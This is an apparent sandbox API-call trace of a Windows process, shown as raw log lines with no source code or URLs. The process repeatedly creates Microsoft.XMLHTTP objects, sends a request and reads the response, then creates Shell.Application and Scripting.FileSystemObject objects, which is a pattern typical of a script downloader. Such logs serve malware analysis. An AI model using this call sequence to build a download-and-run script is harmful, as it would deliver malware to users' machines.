	[0279.754] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7820) returned 0x0
	[0279.754] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0279.754] ??2@YAPEAX_K@Z () returned 0x62f310
	[0279.754] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.754] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7820) returned 0x0
	[0279.754] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7820) returned 0x3
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.755] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7820, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7820, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.755] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.755] SysStringLen (param_1=0x0) returned 0x0
	[0279.755] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0279.755] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0279.755] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0279.755] ??2@YAPEAX_K@Z () returned 0x62f330
	[0279.755] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.755] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0279.755] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0279.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.756] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.756] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.756] SysStringLen (param_1=0x0) returned 0x0
	[0279.756] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0279.756] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0279.756] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0279.756] ??2@YAPEAX_K@Z () returned 0x62f310
	[0279.756] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.756] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0279.756] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0279.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.756] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.757] longjmp () 
	[0279.757] longjmp () 
	[0279.757] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.757] SysStringLen (param_1=0x0) returned 0x0
	[0279.757] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0279.757] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0279.757] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0279.757] ??2@YAPEAX_K@Z () returned 0x62f330
	[0279.757] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f330) 
	[0279.757] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.758] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0279.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0279.758] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0279.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.758] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.758] longjmp () 
	[0279.758] longjmp () 
	[0279.758] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.758] SysStringLen (param_1=0x0) returned 0x0
	[0279.758] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0279.759] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0279.759] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0279.759] ??2@YAPEAX_K@Z () returned 0x62f310
	[0279.759] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.759] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0279.759] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.759] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.760] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0279.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0279.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0279.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0279.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0279.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0279.995] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0279.995] SysStringLen (param_1=0x0) returned 0x0
	[0279.995] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0279.995] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0279.995] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0279.995] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0279.995] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0279.995] ??2@YAPEAX_K@Z () returned 0x62f350
	[0279.995] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0279.995] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0279.995] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0279.995] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0279.995] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0279.995] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0279.995] SysStringLen (param_1=0x0) returned 0x0
